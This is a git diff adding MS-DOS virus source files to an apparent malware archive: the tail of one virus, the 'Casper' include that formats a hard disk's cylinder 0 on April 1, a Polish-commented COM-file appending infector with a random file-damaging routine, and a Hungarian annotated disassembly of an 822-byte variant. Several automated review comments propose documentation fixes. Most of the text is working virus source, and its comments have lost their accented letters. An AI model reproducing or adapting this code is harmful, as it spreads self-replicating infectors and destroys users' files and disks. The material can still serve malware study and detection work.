al=method, cx,dx=offset + cmp ax,6A4h + jb loc_15 ; Jump if below + jmp short loc_14 + nop +loc_13: + jmp short loc_10 +loc_14: + mov cx,cs:data_18e + and cx,0Fh + add cx,5 + mov ax,cs + mov ds,ax + xor dx,dx ; Zero register + mov ax,4000h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_15 ; Jump if carry Set + mov ax,4202h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + sub ax,3 + mov word ptr cs:[2AAh],ax + xor dx,dx ; Zero register + mov ax,4000h + mov cx,2BBh + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_15 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ax,cs + mov ds,ax + mov dx,2A9h + mov ax,4000h + mov cx,3 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_15: + mov ax,5701h + mov cx,word ptr cs:[2ACh] + mov dx,word ptr cs:[2AEh] + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ax,3E00h + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov ds,word ptr cs:[2B0h] + mov dx,word ptr cs:[2B2h] + mov cx,word ptr cs:[2B4h] + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx +loc_16: + pop di + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + jmp short loc_13 + nop + add [bx+si],al + push ax + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + cmp ax,1E03h +;* je loc_17 ; Jump if equal + db 74h, 09h + stosb ; Store al to es:[di] + stosb ; Store al to es:[di] + stosb ; Store al to es:[di] + stosb ; Store al to es:[di] +;* jmp loc_18 + db 0E9h, 15h, 00h + test ax,3AA5h + push ss + db 
0FEh,0B2h,0B9h, 41h, 20h, 00h
+ db 0B8h, 00h, 4Ch, 02h, 00h
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.utility.asm b/MSDOS/Virus.MSDOS.Unknown.utility.asm
new file mode 100644
index 00000000..ae7193dc
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.utility.asm
@@ -0,0 +1,33 @@
+;****************************************************************************
+;*
+;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
+;* *
+;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
+;* *
+;* DETAILS: Date Activated Hard Disk Destroyer. *
+;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
+;* *
+;**************************************************************************
+
+
+
+
+
+ mov ah,2ah ; DOS Get Date.
+ int 21h
+ cmp dx,0401h ; 5th May.
+ jne utilend
+ mov ax,0515h ;Format Cylinder, 15 Sectors.
+ mov ch,0 ;Cylinder 0.
+ mov dx,00 ;Head 0, Drive 80h.
+ mov es,dx ;Junk for address marks.
+ mov bx,0 ;Junk....
+ int 13h ;Do It!
+ int 20h ;Exit
+utilend: jmp entry3
+ db "Hi! I'm Casper The Virus, And On April The 1st I'm "
+ db "Gonna Fuck Up Your Hard Disk REAL BAD! "
+ db "In Fact It Might Just Be Impossible To Recover! "
+ db "How's That Grab Ya! "
+entry3:
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.v_582.asm b/MSDOS/Virus.MSDOS.Unknown.v_582.asm
new file mode 100644
index 00000000..f8eb6a05
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.v_582.asm
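Review bot: The equates at the top of the file (`data_1e equ 20h` through `data_6e equ 86h`) are undocumented, yet `sub_2` writes them with `ds` set to 0 (`xor ax,ax` / `mov ds,ax`, then `mov word ptr ds:data_5e,126h` / `mov ds:data_6e,es`), so they are interrupt-vector slots: 0000:0020h is the INT 08h vector, 0000:004Ch the INT 13h vector and 0000:0084h the INT 21h vector, and the previous vectors are copied into `data_7e`..`data_12e` just before each is overwritten. Naming that in the comment column, e.g. `data_5e equ 84h ; 0000:0084h = INT 21h vector (old value saved in data_11e/data_12e)`, would make the resident hooks obvious to anyone using this listing as an analysis or detection reference. `data_13e equ 441h` deserves the same treatment: near `loc_3` it is written with `ah` = 80h and `ds` = 0, i.e. the BIOS data area diskette-status byte at 0040:0041h. The file is a disassembler listing rather than hand-written source (the `;*` placeholder lines followed by `db` bytes under `loc_4` and `loc_6`), so a header line stating that those `db` sequences are the actual encoding of the commented-out far jumps would also help readers.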
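Review bot: The comment `; 5th May.` on `cmp dx,0401h` contradicts both the header (`DATE: 1st April`) and the value itself: INT 21h AH=2Ah returns the month in DH and the day in DL, so 0401h is 1 April, which also matches the `April The 1st` text in the `db` strings below. Suggest `cmp dx,0401h ; April 1st (DH = month 4, DL = day 1)`. This fragment is an include with no `segment`/`proc` of its own (`USAGE: Is automatically INCLUDED in the assembly of casper.asm`), so its entry-register assumptions come from casper.asm, which is not part of this commit.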
@@ -0,0 +1,324 @@ +; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648. +; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem. +; Komentarze te poprzedzane s znakami AK:. +; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990. + +comment ; +********************************************************** +wszystkie adresy w programie sa uzywane jako wzgledne +do rejestru si ,nie mozna urzywac adresow bezwzglednych +jako offset poniewaz po 'doklejeniu sie do programu +moze on byc w roznych miejscach +********************************************************** +; +adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych + ;w programie wzgledem niego beda + ;obliczane przesuniecia pol zmiennych +start_prg equ 100h ;adres poczatku programu typu .com +ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy +get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA +msdos equ 21h +write equ 40h +wirus_len equ DTA + 43 - start + +code segment byte public 'code' + assume cs:code,ds:code,es:code + + org 100h + +st1: jmp short start + + int msdos + +start: mov dx,offset stare_DTA + cld ;ustawienie kierunku przesylania + mov si,dx ;poczatek zmiennych programu + add si,ofst_rozk ;adres pola rozkazy + mov di,100h ;adres pod ktorym jest poczatek programu + mov cx,3 ;ilosc bajtow do przeslania + repz movsb ;odtworzenie starego poczatku + + mov si,dx ;odtworzenie si + +; AK: pominito badanie wersji DOS + + push es ;zachowanie es bo bedzie zmieniane + mov ah,get_dta_addr ;pobierz adres DTA + int msdos + mov [si],bx ;zapamietanie adresu DTA w polu + mov [si+2],es ;stare_DTA + pop es ;odtworzenie es + + mov dx,5Fh ;adres pola DTA + add dx,si + mov ah,1Ah ;ustaw adres DTA ds:dx + int msdos + +; AK: zmieniona jest kolejno instrukcji, teraz do przechowania SI uyto +; DX zamiast stosu + + push es ;zachowanie es + push si ;zachowaj si + add si,1ah ;adres tekstu PATH= + mov dx,si + mov es,ds:[2Ch] ;adres srodowiska set + +; AK: w 
oryginale jest to PUSH SI, POP SI + + mov di,0 + +szukaj_dalej: + mov si,dx + lodsb + mov cx,8000h ;dlugosc srodowiska + repnz scasb ;szukanie litery P + mov cx,4 ;dlugosc reszty ATH= + +porownuj: + lodsb + scasb + jnz szukaj_dalej + loop porownuj + + pop si ;odtworz rejestry + pop es + + mov [si+16h],di ;adres pierwszego bajtu za PATH= + mov di,si + add di,1Fh ;adres bufora dla nazwy zbioru + mov bx,si + jmp short dalej + +nast_sciezka: + cmp word ptr[si+16h],0 ;czy koniec path + jnz l1 ;nie + + jmp exit1 ;zakoncz nie ma wiecej zbiorow + +l1: push ds + push si + mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany + mov di,si + mov si,es:[di+16h] + add di,1Fh + +next: lodsb ;zaladuj kolejny znak sciezki dostepu + cmp al,';' ;czy koniec definicji scierzki + jz koniec_sciezki + cmp al,0 ;czy koniec lancucha path + jz koniec_set + stosb ;przepisz znak do bufora + jmp short next + +koniec_set: + mov si,0 +koniec_sciezki: + pop bx + pop ds + mov [bx+16h],si ;adres do ktorego przeszukano path + cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \ + jz dalej + mov al,'\' + stosb ;dopisz \ + +dalej: mov [bx+18h],di + mov si,bx + add si,10h + mov cx,6 + repz movsb ;przepisanie *.com \0 + mov si,bx + mov ah,4Eh ;find first + mov dx,1Fh + add dx,si + mov cx,3 ;ukryty tylko do odczytu + int msdos + jmp short czy_jest + +szuk_nast: + mov ah,4Fh ;find next + int msdos + +czy_jest: + jnc jest + + jmp short nast_sciezka + +jest: mov ax,[si+75h] ;pole zawierajace czas w DTA + and al,1Fh ;czy sa 62 sekundy + cmp al,1Fh + + jz szuk_nast + cmp word ptr [si+79h],0FA00h + ja szuk_nast ;jesli zbyt dlugi + cmp word ptr [si+79h],10 + jc szuk_nast + + mov di,[si+18h] + push si + add si,7Dh +kopiuj: + lodsb ;kopiuje nazwe zbioru + stosb ;nazwa w postaci ASCIIZ + cmp al,0 ;czy koniec nazwy + jnz kopiuj + pop si + + mov ax,4300h ;pobierz atrybuty zbioru + mov dx,1Fh + add dx,si + int msdos + mov [si+8],cx ;zapamietanie atrybutow + + mov ax,4301h ;ustaw atrybuty + and cx,0FFFEh ;usuwa 
ewentualne r/o + mov dx,1Fh + add dx,si + int msdos + + mov ax,3D02h ;otwarcie zbioru + mov dx,1Fh + add dx,si + int msdos + + jnc l2 ;czy poprawne otwarcie + + jmp exit2 + +l2: mov bx,ax + mov ax,5700h ;pobierz czas i date powstania zbioru + int msdos + mov [si+4],cx ;czas + mov [si+6],dx ;data + + mov ah,2Ch ;pobierz czas systemowy + int msdos + + and dh,7 ;sekundy + jnz zostaw + +comment ; +********************************************************** +tutaj mozna umiescic dowolna procedure uszkadzajaca zbior +ta wywolywana jest losowo jesli ostatnie trzy bity sekund +zegara systemu sa rowne zero np. 8,16,24 itd. +********************************************************** +; + mov ah,write ;zapis do zbioru + mov cx,5 ;pieciu bajtow lezacych + mov dx,si ;juz poza programem czyli + add dx,8Ah ;faktycznie dowolnych + int msdos + jmp exit3 + +;********************************************************* +;koniec procedury uszkadzajacej zbior +;********************************************************* + +zostaw: mov ah,3Fh ;odczyt trzech pierwszych + mov cx,3 ;bajtow z pliku + mov dx,ofst_rozk ;do pola rozkazy + add dx,si + int msdos + + jc exit3 ;jesli byl blad czytania + + cmp ax,3 ;czy odczytano dokladnie + jnz exit3 ;trzy bajty + + mov ax,4202h ;przewiniecie zbioru na koniec + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov cx,ax ;w ax dlugosc zbioru + sub ax,3 +;obiczanie przesuniecia dla skoku do poczatku wirusa +;jest to adres konca zbioru minus 3 poniewaz +;jmp jest trzy bajtowy + + mov [si+0Eh],ax ;zapis adresu w polu skok + + add cx,adr_baz - start + start_prg +;obliczanie adresu poczatku danych (tego ktory jest w si) +;jest to adres pola stare_DTA + 100h przesuniecia programu + + mov di,si + sub di,adr_baz - start - 1 + mov [di],cx ;zapisanie adresu bezposrednio w pole + ;w pole rozkazu mov dx,offset + + mov ah,write ;dopisanie wirusa na koniec + mov cx,wirus_len ;dlugosc wirusa + mov dx,si + sub dx,adr_baz - start ;obliczenie adresu poczatku 
wirusa + int msdos + + jc exit3 ;jesli blad + cmp ax,wirus_len ;czy zapisano calego wirusa + jnz exit3 + + mov ax,4200h ;przewiniecie zbioru na poczatek + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov ah,write ;zapis jmp do wirusa + mov cx,3 ;na poczatku + mov dx,si + add dx,0Dh ;pole skok + int msdos + +exit1: mov dx,[si+6] ;data + mov cx,[si+4] ;czas + or cx,1Fh ;zaznaczenie ze zbior jest zarazony + ;ilosc sekund = 62 + + mov ax,5701h ;zapis daty i czasu do zbioru + int msdos + + mov ah,3Eh ;zamkniecie zbioru + int msdos + +exit2: mov ax,4301h ;ustawienie atrybutow + mov cx,[si+8] ;stare atrybuty + mov dx,001Fh + add dx,si + int msdos + +exit3: push ds + mov ah,1Ah ;ustaw adres DTA + mov dx,[si+0] ;pole stare_DTA + mov ds,es:[si+2] + int msdos + + pop ds + + xor ax,ax ;zerowanie rejestrow + xor bx,bx + xor dx,dx + xor si,si + mov di,0100h ;na stos adres startu + push di + xor di,di + ret + +stare_DTA dd 0 +czas_zb dw 0 +data_zb dw 0 +attr_zb dw 0 +rozkazy db 0b4h,4ch,0cdh +skok db 0e9h,0,0 ;kod rozkazu jmp +zbior db '*.com',0 +srodow dw 0 ;adres srodowiska set +bufor dw 0 ;wskaznik do nazwy zbioru +path db 'PATH=' +nazwa_zb db 63 dup(0) ;pole na nazwe zbioru +DTA db 43 dup(0) ;pole dta + +code ends + end st1 + diff --git a/MSDOS/Virus.MSDOS.Unknown.v_822.asm b/MSDOS/Virus.MSDOS.Unknown.v_822.asm new file mode 100644 index 00000000..381cc2c0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_822.asm 
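Review bot: The Polish comments throughout the hunk have lost every non-ASCII character rather than being transcoded — `Kod rdowy`, `wpywy`, `pominito`, `kolejno`, `uyto` in the header and `AK:` lines read as `Kod źródłowy`, `wpływy`, `pominięto`, `kolejność`, `użyto` — which suggests the file was converted from a DOS code page (likely CP852 or Mazovia) with unmapped bytes dropped. Since the `AK:` notes are the only documentation distinguishing this variant from the 648 it cites, the file should be re-exported from the original with the encoding declared, or at least carry a header line such as `; NOTE: Polish diacritics were stripped during conversion; comments are approximate.`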
@@ -0,0 +1,669 @@ + + + A Resetel vrus Tltget fle mutnsa + *************************************** + + +A Resetel vrussal teljes egszben megegyezik a fertz mechanizmus. +Eltekintve attl, hogy ez a mutns nem tesz tnkre fjlokat. Az adatterlet is +ugyanazon a cmen van, gy ugyangy lehet rtani, mint a Resetelt. A vltozs: +a vrus hossza 822 byte, minden indts utn az A:-rl megprblja beolvasni a +BOOT-ot, majd a 40/80-dik svot. Ha valamelyik Tltgetvel fertztt, akkor +elindtja a Tltgett ! + + + ;Ide (0100-ra) mutat a file elejrl az ugr utasts. + + ;Els feladat: az els 3 byte visszarsa az eredetire. + +0100 51 PUSH CX ;CX a stacken marad mindvgig. + ;A kvetkez utasts operandust ( jelen esetben 02F9-et ) + ;fertzskor lltja be , gy mindig a helyes cmre mutat. +0101 BAF902 MOV DX,02F9 ;Eredeti els 3 byte cme-10h +0104 FC CLD ;( ERE_DTA_OFS) +0105 8BF2 MOV SI,DX +0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD +010B BF0001 MOV DI,0100 ;Program eleje +010E B90300 MOV CX,0003 ;3 byte +0111 F3 REPZ +0112 A4 MOVSB ;Az eredeti byteok visszalltsa + + + ;----------------------------------------- + ; Installcis rsz: + ;----------------------------------------- + + ;DOS verzi lekrdezse. 1.00-nl kisebb verzinl az eredeti + ;program futtatsa: ekkor a vrus nem mkdik. + +0113 8BF2 MOV SI,DX ;Ezutn SI-ben az adatterlet cme +0115 B430 MOV AH,30 +0117 CD21 INT 21 ;DOS verzi lekrdezse +0119 3C00 CMP AL,00 ;Csak 1.00-nl kisebbnl lp ki +011B 7503 JNZ 0120 +011D E9C701 JMP 02E7 ;Eredeti program futtatsa + + + ;Disk Transzfer Address lekrdezse, elmentse + +0120 06 PUSH ES +0121 B42F MOV AH,2F +0123 CD21 INT 21 ;DTA leolvassa (ES:BX), megrzse +0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9) +0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB) + + ;------------------------------------------------------- + ; A beiktatott behz rsz + ;------------------------------------------------------- + +012D E85802 CALL 0388 +0130 07 POP ES + + ;DTA belltsa ENTRY cmre (0358). 
Igy a FindFirst, FindNext + ;DOS funkcik ide fogjk msolni a file adatait (nevt,idejt, + ;hosszt,stb). + +0131 BA5F00 MOV DX,005F + ;{Valsznleg rgi assemblerrel rtk a vrust, ezrt van itt + ;egy NOP utasts.} +0134 90 NOP +0135 03D6 ADD DX,SI +0137 B41A MOV AH,1A +0139 CD21 INT 21 ;DTA lltsa DS:DX-re: ENTRY(0358) + + + ;A PATH-ok cmnek megkeresse. Ha az aktulis knyvtrban mr + ;mindegyik filet megfertzte , itt tajlja meg azoknak az al- + ;knyvtraknak a nevt , amelyekben mg megfertzend fileokat + ;tallhat. + +013B 06 PUSH ES +013C 56 PUSH SI +013D 8E062C00 MOV ES,[002C];Environment (krnyezet) segmense +0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel helyre + ;(a kvetkez directoryra) mutatni + + + ;A kvetkez rsz a PATH= szveget keresi meg az environment + ;terleten: + +0144 5E POP SI +0145 56 PUSH SI +0146 81C61A00 ADD SI,001A ;STR_PATH (0313) +014A AC LODSB ;AL=DS:[SI],SI++ +014B B90080 MOV CX,8000 ;max 32k az environment +014E F2 REPNZ +014F AE SCASB ;AL-ES:[DI] Megkeresi a kvetkez + ;'P' bett +0150 B90400 MOV CX,0004 ;Mg 4 bet azonostsa +0153 AC LODSB ;AL=DS:[SI],SI++ +0154 AE SCASB ;AL-ES:[DI],DI++ +0155 75ED JNZ 0144 ;Ugrs, ha a kvetkez 4 bet nem + ;egyezik (nem 'ATH=') +0157 E2FA LOOP 0153 +0159 5E POP SI ;ES:DI mutat az els PATH-ra +015A 07 POP ES +015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F) + + +015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ksbb gyis +0161 81C71F00 ADD DI,001F ;fellrja} FILE_PATH (0318) +0165 8BDE MOV BX,SI ;Ezutn BX mutat az adatokra +0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat +016B 8BFE MOV DI,SI ;{Az elbb mr bellitotta (?)} +016D EB3A JMP 01A9 + + + ;A kvetkez PATH-ban megadott aldirectoryt FILE_PATH-ra m- + ;solja. Igy a kvetkez fileokat mr ebben az aldirectoryban + ;fogja keresni. + +016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F) +0174 7503 JNZ 0179 +0176 E96001 JMP 02D9 ;Ugrs, ha nincs tbb PATH aldir. 
+ ;(mindet megfertte mr) +0179 1E PUSH DS +017A 56 PUSH SI +017B 26 ES: +017C 8E1E2C00 MOV DS,[002C] ;Environment segmense +0180 8BFE MOV DI,SI ;(02F9) +0182 26 ES: +0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F) +0187 81C71F00 ADD DI,001F ;FILE_PATH cme (0318) +018B AC LODSB ;AL=DS:[SI] SI++ +018C 3C3B CMP AL,3B ;';' +018E 740A JZ 019A +0190 3C00 CMP AL,00 +0192 7403 JZ 0197 +0194 AA STOSB ;ES:[DI]:=AL DI++ +0195 EBF4 JMP 018B ;tmsols ';' vagy #0-ig + + ;#0-val zrult a PATH bejegyzs => nem lesz tbb +0197 BE0000 MOV SI,0000 +019A 5B POP BX ;Ezutn BX mutat az adatokra +019B 1F POP DS +019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0 + ;( Nincs tbb PATH jelzs ) + + ;A kvetkez PATH-ban adott aldir. mr tmsolva. +01A0 807DFF5C CMP BYTE PTR [DI-01],5C +01A4 7403 JZ 01A6 ;Ugrs, ha az utls bet a '\' +01A6 B05C MOV AL,5C ;Egybknt '\' rs +01A8 AA STOSB ;ES:[DI]:=AL DI++ + + + + + ;Egy aldirectory kirtkelse . Elszr az aktulis , majd a + ;FILE_PATH -ra msolt aldirectory vgignzse, fertzs. + ;DI a FILE_PATH-ba rt aldirectory neve utni pozicira mutat. + + + ;A COM kiterjeszts fileok megkeresse: + +01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311) + ;Ide kell majd a file nevt + ;msolni (az aldir. neve utn) +01AD 8BF3 MOV SI,BX ;(02F9) +01AF 81C61000 ADD SI,0010 ;KERES_STR (0309) +01B3 B90600 MOV CX,0006 ;6 bet tmsolsa ('*.COM',0) +01B6 F3 REPZ ;A PATH-ban megadott aldirectory +01B7 A4 MOVSB ;mg , gy teljes keressi utunk + ;lesz +01B8 8BF3 MOV SI,BX ;(02F9) +01BA B44E MOV AH,4E ;FIND FIRST ENTRY +01BC BA1F00 MOV DX,001F +01BF 90 NOP +01C0 03D6 ADD DX,SI ;FILE_PATH (0318) +01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY +01C5 CD21 INT 21 ;Az els COM kiterjeszts file + ;megkeresse . A file adatait a DTA + ;ltal mutatott cmre (ENTRY 0358) + ;msolja. +01C7 EB04 JMP 01CD + + + ;Kvetkez COM file keresse (adatai ENTRY-re kerlnek). 
+ +01C9 B44F MOV AH,4F ;FIND NEXT +01CB CD21 INT 21 +01CD 7302 JNB 01D1 +01CF EB9E JMP 016F ;Ha nem tall tbb COM filet : j + ;aldirt keres a PATH-ban + + + ;Mr tallt COM filet. Adataival az ENTRY fel van tltve.Ennek + ;a filenak az ellenrzse, fertzse kvetkezik. + + ;Annak ellenrzse , hogy a file megfertzhet-e (fertztt-e, + ;tl hossz-e, tl rvid-e) . Ha nem fertzhet visszaugrik j + ;fileokat keresni. + +01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje +01D5 241F AND AL,1F +01D7 3C1F CMP AL,1F ;Ugrs, ha az als 5 bit 1-es: +01D9 74EE JZ 01C9 ;a file mr fertztt. +01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372) +01E1 77E6 JA 01C9 ;Ugrs, ha file hossza nagyobb,mint + ;64000h (mr nem fr bele a vrus) +01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372) +01E8 72DF JB 01C9 ;Ugrs, ha rvidebb 10h bytenl + + + ;----------------------------------------- + ; Megvan a kivlaszott file. + ;----------------------------------------- + + ;A file nevt az aldirectory neve utn kell msolni , hogy a + ;teljes t rendelkezsnkre lljon , gy majd meg tudja nyitni + ;a filet. +01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja +01EE 56 PUSH SI ;a file nevt msolni +01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376) + +01F3 AC LODSB ;AL:=DS:[SI] SI++ +01F4 AA STOSB ;ES:[DI]:=AL DI++ (Msols) +01F5 3C00 CMP AL,00 ;Nvlezr 0-ig msol +01F7 75FA JNZ 01F3 +01F9 5E POP SI ;SI jra az adatokra mutat + + + ;A file egyes eredeti informciinak megrzse , hogy a fert- + ;zs ne tnjn fel. + + ;Az eredeti attributtum megrzse: + + ;{Fogalmam sincs mirt kell a file attributtumt mg egyszer + ;lekrdezni , amikor az ENTRY terleten megtallhat . 
Taln a + ;vrus rja nem tudta?} +01FA B80043 MOV AX,4300 ;File attributtumnak lekrdezse +01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318) +0200 90 NOP ;{piszok} +0201 03D6 ADD DX,SI ;DS:DX mutat a file tjra +0203 CD21 INT 21 ;CX-ben az attributtum +0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301) + + + ;A file rsvdelmnek trlse: + +0209 B80143 MOV AX,4301 ;File attributtumnak llitsa +020C 81E1FEFF AND CX,FFFE ;Read Only jelzs trlse +0210 BA1F00 MOV DX,001F ;{ Az elbb mr belltotta, minek +0213 90 NOP ;jra? } +0214 03D6 ADD DX,SI ;FILE_PATH (0318) +0216 CD21 INT 21 + + + ;File megnyitsa: + +0218 B8023D MOV AX,3D02 ;File megnyitsa rsra, olvassra +021B BA1F00 MOV DX,001F ;{Mg egyszer belltja!} +021E 90 NOP ;{piszok} +021F 03D6 ADD DX,SI ;FILE_PATH (0318) +0221 CD21 INT 21 +0223 7303 JNB 0228 +0225 E9A200 JMP 02CA ;Hibnl: nincs fertzs +0228 8BD8 MOV BX,AX ;Handle + + + ;A file eredeti (mostani) idejnek lekrdezse: + + ;{Ez is megtallhat lenne az ENTRY terleten!} +022A B80057 MOV AX,5700 ;Get Date & Time +022D CD21 INT 21 +022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD) +0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF) + + + ;Annak eldntse , hogy a kivlasztott filet tnkretegye-e , + ;vagy megfertzze . Lekrdezi a jelenlegi idt , s ha msod- + ;perceinek szma 8-cal oszthat , akkor a filet resetelv te- + ;szi, egybknt pedig megfertzi. Igy az esetek 2/15-d rsz- + ;ben teszi csak tnkre a filet. + +0237 B42C MOV AH,2C ;A mostani id lekrdezse +0239 CD21 INT 21 +023B 80E607 AND DH,07 ;A msodpercek als 3 bitje +023E EB0D JMP 024D ;Fertzs +0240 90 NOP + + + ; Szemt a Reseletlbl + +0241 B440 MOV AH,40 +0243 B90500 MOV CX,0005 +0246 8BD6 MOV DX,SI +0248 81C28A00 ADD DX,008A +024C 90 NOP + + ;----------------------------------------- + ; Fertzs: + ;----------------------------------------- + + + ;Az eredeti file els 3 bytejnak megrzse , hogy ksbb mg + ;futtatni lehessen. 
+024D B43F MOV AH,3F ;Olvass filebl +024F B90300 MOV CX,0003 ;Az els 3 byte beolvassa +0252 BA0A00 MOV DX,000A +0255 90 NOP ;{piszok} +0256 03D6 ADD DX,SI ;ERE_KEZD (0303) +0258 CD21 INT 21 +025A 7255 JB 02B1 ;Hibnl vge +025C 3D0300 CMP AX,0003 +025F 7550 JNZ 02B1 ;Hibnl vge + + + ;File vgre lls, az j cmek kiszmtsa: + +0261 B80242 MOV AX,4202 ;File Pointer file vgre lltsa +0264 B90000 MOV CX,0000 +0267 BA0000 MOV DX,0000 +026A CD21 INT 21 +026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!} + + + ;A file elejre irand JMP operandusnak kiszmtsa: + +026E 8BC8 MOV CX,AX ;AX-ben a file hossza +0270 2D0300 SUB AX,0003 ;AX-ben az eltols a JMP utasts- + ;hoz, ahhoz amit a file elejre fog + ;majd rni . Igy ez a JMP a file + ;mostani vge utni bytera fog mu- + ;tatni. +0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307) + + + ;Az j fileon belli adatterlet cmnek kiszmtsa s bel- + ;ltsa: + +0277 81C1F902 ADD CX,02F9 ;CX az j fileon belli adatter- +027B 8BFE MOV DI,SI ;letre mutat. +027D 81EFF701 SUB DI,01F7 ;A vrus els utastsnak (MOV DX, + ;02F9) operandusnak cme. +0281 890D MOV [DI],CX ;Ide rja az adatterlet cmt + + + ;----------------------------------------- + ; A vrus hozzmsolja magt a filehoz: + ;----------------------------------------- + + ;(A filemutat a file vgre mutat.) +0283 B440 MOV AH,40 ;Irs fileba. +0285 B93603 MOV CX,0336 ;822 byte (a vrus hossza) +0288 8BD6 MOV DX,SI +028A 81EAF901 SUB DX,01F9 ;DX a vrus els bytejra mutat +028E CD21 INT 21 +0290 721F JB 02B1 ;Hibnl vge +0292 3D3603 CMP AX,0336 +0295 751A JNZ 02B1 ;Ha nem rta ki mind a 648 byteot + + + ;Az els 3 byte tlltsa, egy a file vgre mutat ugr uta- + ;stsra: + +0297 B80042 MOV AX,4200 ;A file pointer a file elejre! 
+029A B90000 MOV CX,0000 +029D BA0000 MOV DX,0000 +02A0 CD21 INT 21 +02A2 720D JB 02B1 ;{Itt sem lehet hiba!} + +02A4 B440 MOV AH,40 ;Irs fileba +02A6 B90300 MOV CX,0003 ;3 byte +02A9 8BD6 MOV DX,SI +02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr utastsra +02AF CD21 INT 21 ;mutat + + + ;Az eredeti id ( mr a fertzsjelzssel egytt ) visszall- + ;tsa: + +02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF) +02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D) +02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!} +02BD 81C91F00 OR CX,001F ;Mr volt fertzve jelzs +02C1 B80157 MOV AX,5701 ;Set Date & Time +02C4 CD21 INT 21 + + + ;A file lezrsa: + +02C6 B43E MOV AH,3E ;Close Handle +02C8 CD21 INT 21 + + + ;Az eredeti attributtum visszalltsa: + +02CA B80143 MOV AX,4301 ;Set File Attributtum +02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301) +02D1 BA1F00 MOV DX,001F +02D4 90 NOP +02D5 03D6 ADD DX,SI ;FILE_PATH (0318) +02D7 CD21 INT 21 + + + ;DTA visszalltsa az eredeti cmre: + +02D9 1E PUSH DS +02DA B41A MOV AH,1A ;Set DTA +02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9) +02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB) +02E4 CD21 INT 21 +02E6 1F POP DS + + + ;----------------------------------------- + ; Az eredeti program futtatsa: + ;----------------------------------------- + +02E7 59 POP CX ;CX visszalltsa +02E8 33C0 XOR AX,AX ;Regiszterek nullzsa +02EA 33DB XOR BX,BX +02EC 33D2 XOR DX,DX +02EE 33F6 XOR SI,SI +02F0 BF0001 MOV DI,0100 +02F3 57 PUSH DI ;0100 a stackre +02F4 33FF XOR DI,DI +02F6 C2FFFF RET FFFF ;100-on folytatdik a vezrls + ;SP-- {Hogy minek?} + + + + ;----------------------------------------- + ; ADAT TERLET + ;----------------------------------------- + + + ;Ide mutat (02F9-re) a vrus elejn DX, ksbb SI,BX. + +02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cme +02FB ERE_DTA_SEG DW (?) ;[SI+02] + +02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje, +02FF ERE_DATE DW (?) 